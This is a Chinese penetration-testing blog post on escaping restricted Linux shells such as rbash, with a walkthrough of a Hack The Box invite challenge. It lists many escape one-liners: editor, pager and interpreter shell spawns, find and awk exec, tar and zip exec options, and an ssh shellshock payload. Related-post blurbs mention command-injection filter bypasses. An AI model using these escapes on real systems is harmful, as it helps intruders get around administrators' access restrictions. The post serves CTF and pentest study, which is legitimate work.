渗透linux不能执行命令,渗透技巧——如何逃逸Linux的受限制shell执行任意命令

最新推荐文章于 2022-12-06 17:30:32 发布
最新推荐文章于 2022-12-06 17:30:32 发布
阅读量495 收藏 4
点赞数
文章标签: 渗透linux不能执行命令

fcaa2b51b01dd44d2fd6e9c1ebe0cddf.png

97a05270559bd64a048a04bcbb76a030.png

0x01 前言

今早在刷twitter的时候看到了一篇文章(https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf?rss),介绍了如何在受限制的shell中执行任意命令,实现交互。其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时,由于当前shell的限制,很多命令不能执行,导致后续的渗透无法进行,在这篇文章中,就介绍了一些常见的绕过方法,同时在文章末尾提供了一个线上的练习环境。

我就该文章提到的相应技术细节进行复现,同时附带上一些自己的思考,于是便有了本文。如有谬误,还望各位师傅斧正。

97a05270559bd64a048a04bcbb76a030.png

0x02 技术背景及简介

在文章开始,首先来介绍一下什么是受限制的shell。简单理解,受限制的shell是说限制了一个shell的部分命令,像cd、ls、echo,或者是限制了一些环境变量,诸如SHELL、PATH、USER。有些情况下,受限制的shell也会限制包含/的命令,或者限制一些输出符,像>、>>等。常见的受限制shell有:rbash、rksh、rsh。

不过话又说回来了,为什么有的人会创建这种受限制的shell呢?什么样的业务场景需要这种受限制的shell。

通常来讲,构建一个受限制的shell通常处于以下目的:

1、提高操作系统的安全性

2、阻止攻击者,防止其进行后续的渗透

3、有时,系统管理员也会创建受限制的shell防止自己输入一些危险命令,影响业务

4、制作CTF题目(Root-me、hackthebox、vulnhub)

97a05270559bd64a048a04bcbb76a030.png

0x03 枚举Linux环境

枚举是找到突破方法的重要组成部分。我们需要枚举Linux环境来检测为了绕过rbash我们可以做哪些事。

在正式进行绕过测试之前,我们需要进行以下操作:

1、首先,我们必须检查可用命令,像cd、ls、echo等

2、接下来我们要检查常见的操作符,像>、>>、

3、然后对可用的编程语言进行检查,如perl、ruby、python等

4、通过sudo -l命令检查我们可以使用root权限运行哪些命令

5、使用SUID perm检查文件或命令。

6、使用echo $SHELL命令检查当前使用的是什么shell(90%得到的结果是rbash)

7、使用env或者printenv命令检查环境变量

通过以上操作,我们已收集到一些游泳的信息,接下来尝试一下通用的利用方法。

97a05270559bd64a048a04bcbb76a030.png

0x04 通用利用技巧

1、如果"/"命令可用的话,运行/bin/sh或者/bin/bash

2、运行cp命令,将/bin/sh或者/bin/bash复制到当前目录

3、在ftp中运行!/bin/sh或者!/bin/bash,如下图所示

e68eca1cebbd91e9b1e47b315018c93c.png

4、在gdb中运行!/bin/sh或者!/bin/bash

5、在more、man、less中运行!/bin/sh或者!/bin/bash

6、在vim中运行!/bin/sh或者!/bin/bash

7、在rvim中执行:python import os; os.system("/bin/bash )

8、scp -S /path/yourscript x y:

9、awk 'BEGIN {system("/bin/sh or /bin/bash")}'

10、find / -name test -exec /bin/sh or /bin/bash \;

其中第6、7、8几种方法暂未在本地复现。

97a05270559bd64a048a04bcbb76a030.png

0x05 编程语言技巧

利用常见的编程语言解释器实现受限制shell的绕过

1、使用except spawn

2、python -c 'import os; os.system("/bin/sh")'

3、php -a then exec("sh -i");

4、perl -e 'exec "/bin/sh";'

5、Lua:os.execute('/bin/sh').

6、ruby:exec "/bin/sh"

97a05270559bd64a048a04bcbb76a030.png

0x06 高级利用技巧

1、ssh username@IP – t "/bin/sh" or "/bin/bash"

2、ssh username@IP -t "bash –noprofile"

3、ssh username@IP -t "() { :; }; /bin/bash" (shellshock)

4、ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)

5、git帮助状态下通过!/bin/bash进入交互式shell

6、pico -s "/bin/bash"进入编辑器写入/bin/bash然后按ctrl + T键

7、zip /tmp/test.zip /tmp/test -T –unzip-command="sh -c /bin/bash"

8、tar cf /dev/null testfile –checkpoint=1 –checkpointaction=exec=/bin/bash

C SETUID SHELL :

90cba4b80cc0a09ed89ac6546feac974.png

97a05270559bd64a048a04bcbb76a030.png

0x07 线上练习环境

原文提供了两个线上练习环境,这里对相应的题解进行解答。

先来看下这个站点https://www.hackthebox.eu/,这个站点需要注册登陆后才能使用其中的题目,根据faq,注册需要完成一个线上挑战,https://www.hackthebox.eu/invite

158dccacaf3f7c6702ba6cd2c8031c85.png

简单尝试了下,开始看前端的代码,

a51d10155347663fc934f0b4ae0236d5.png

访问https://www.hackthebox.eu/js/inviteapi.min.js

在console下执行makeInviteCode()

46a73000e7d7efd16f75744f85b1ce1f.png

根据data和相应的加密方式还原出明文信息。

118f145732ba7ac33987260ab2d29b0b.png

根据提示是向该地址发送POST包,

4189f04d52ec38f83e4c8a52d7011184.png

对code的内容进行解码,即获得了相应的邀请码,拿去注册即可。

cca4e41226a90f09b41d920bf04aeb3b.png

大概看了下,这个网站的内容还是挺有趣的,所以不打算在这节介绍了,以后有机会开个系列详细介绍。

97a05270559bd64a048a04bcbb76a030.png

0x08 参考链接

https://www.root-me.org/en/Challenges/App-Script/Restricted-shells

https://www.hackthebox.eu/

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf?rss

https://www.cnblogs.com/lzrabbit/p/4298794.html

6c84eb5759a5fc4f906a5b2937603c5a.png

百分之二十六
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux环境下模拟实现命令解释器_反弹shell逃逸基于execve的命令监控(上)
weixin_39623271的博客
12-21 258
微信公众号:七夜安全博客关注信息安全技术、关注 系统底层原理。问题或建议,请公众号留言。一.前言本篇聊一聊 新的主题:《反弹shell-逃逸基于execve的命令监控》,打算写一个专题,预估可以写三篇,内容确实有点多,也是最近研究了一些有意思的东西,想给大家分享一下。喜欢的话,请大家一定点在看,并分享出去,算是对我原创最大的支持了。二.Shell命令监控在linux中,大家用的比较多的...
linux脚本攻击,恶意shell脚本攻击的方法与预防策略
weixin_26837345的博客
05-01 2555
前言网络安全对于互联网从业者而言,一直是一个重要的、绕不开的话题,PowerShell可以给运维人员带来极大的方便,但同时也是被攻击者盯上的重灾区。想想就非常可怕,攻击的人只要能从远程执行shell脚本,就能执行一些敏感的安全操作,比如篡改重要数据,修改安全配置等。所以我们有必要掌握一些恶意shell脚本攻击的方法与预防策略。PowerShell攻击方法PowerShell攻击方法一般分为两方面:...
Linux - 专用登陆机器上,禁止指定命令运行
IT架构师
06-29 451
在登陆机器上,禁止指定命令运行,以确保这类机器足够流畅。
远程登录linux 执行不了命令,linux不开账号允许远程执行命令
weixin_39604598的博客
05-05 170
2016-09-21周海汉 2016.9.21如果允许用户可以远程执行一些linux命令,但并不希望在系统中给用户单独建立账号。而每个用户还需要隔离,需要认证是否是系统允许的合法用户。同时需要限制操作的范围和权限,限制用户远程登录,具有良好的安全性。有什么好的办法呢?下面是一种解决方案。用户端生成证书:➜ .ssh % ssh-keygenGenerating public/private rsa...
shell脚本遇到的一些坑
sf_jiang的博客
12-24 2128
1,不同脚本共用同一个全局变量引发的血案 b脚本引用另一个a脚本,类似于C语言里面的 include 引用,C冲突了还好,有静态编译检查;但是 shell 脚本冲突了就甭想它给你提示,除非你目的就是要用a脚本的变量,否则脚本之间变量冲突产生的问题令人莫名其妙。这里也引出了 sh 的编程规范,尽量不用全局变量,函数里面变量尽量加 local 限制。 2,在管道里面exit 引发的血案 ......
linux c++ 调用shell命令,保存执行结果 示例
01-07
下面的代码用于在c++函数里面调用shell,并且执行命令,取回命令执行结果。 #include #include #include #include int main() { const int SIZE = 64; const int MAX_RESPONSE_SIZE = 65535; char charBuff[SIZE...
linux执行shell命令方法简介
09-15
Linux操作系统中,执行Shell命令是日常操作的重要组成部分。Shell是一种命令解释器,它允许用户与操作系统进行交互,执行各种任务。本文将介绍两种在Linux执行Shell命令的方法,并探讨`source`命令与直接执行...
linux shell命令执行顺序的控制方法
09-15
有关linux shell命令执行顺序的控制办法,知识点很小,但却非常实用,建议朋友们看看
python文件读写操作与linux shell变量命令交互执行的方法
09-15
主要介绍了python文件读写操作与linux shell变量命令交互执行的方法,涉及对文件操作及Linux shell交互的技巧,需要的朋友可以参考下
渗透测试】--- rbash逃逸方法简述
qq_43168364的博客
12-29 4154
一、rbash简述 1.什么是rbash 它与一般shell的区别在于会限制一些行为,让一些命令无法执行 2.如何设置一个rbash cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行命令 二、枚举Linux环境 1.检查可用的命令 如 cd、ls、su
总结的7个shell字符串操作方法和实例分享
09-15
主要介绍了总结的7个shell字符串操作方法和实例分享,包括长度获取、查找位置、字符截取、匹配查询等,需要的朋友可以参考下
国内外优秀网安练习平台
最新发布
Ms08067安全实验室
12-06 793
0x01 前言小编总结网上一些靶场类型,并进行了分类,整理不足可以及时给小编留言!0x02基础类靶场1. DVWA:http://www.dvwa.co.u2.BWVS:https://github.com/bugku/BWVS3.Webug3.0:https://pan.baidu.com/s/1cM39UrKeWjS92-3am8L_bg?pwd=xjqr4. BWAPP:https://...
rbash逃逸
leoriclee的博客
07-02 545
枚举Linux环境 枚举是本文中最重要的内容。我们需要通过枚举Linux环境来考察可以绕过rbash做哪些事情。 我们需要枚举: 1)首先,我们必须检查有哪些可用的命令,如cd / ls / echo等。 2)我们必须检查诸如>、>>、<、|之类的操作符。 3)我们需要检查可用的编程语言,如perl、ruby、python等。 4)我们能够以root身份运行哪些命令(sudo -l)。 5)检查具有SUID权限的文件或命令。 6)必须检查当前所用的shell,具体命令为:echo $
linux进行rbash逃逸的方法
u013930899的博客
09-12 1131
rbash逃逸方法步骤
限制linux用户执行命令,如何在Linux中限制用户命令
weixin_30415591的博客
05-07 1935
有很多不同的方法可以实现这一点。 我将列出几种可能的解决方案之一。我会建议使用几个不同的保护层来防止用户运行他们不应该被允许访问的命令。 这里的所有方向都假设用户有他们自己的/home/[username]目录,他们的shell是/bin/bash ,你希望他们在登录到系统时使用bash shell。1)更改目录权限,以便只有用户可以编辑其主目录的内容chmod 755 /home/[userna...
受限制的/bin/bash-rbash(vi法和PATH法)
qq_45290991的博客
08-07 518
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进...
渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种提权方式练习
serendipity1130的博客
09-06 1472
靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 环境配置: 1.因为直接开机的security靶机NAT连接,无法
挖洞经验 | 命令注入突破长度限制
3569
12-03 2502
0×01 背景 http://www.freebuf.com/articles/web/154453.html 很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云
命令执行的一些绕过技巧
m0_55754984的博客
09-14 3446
① 空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值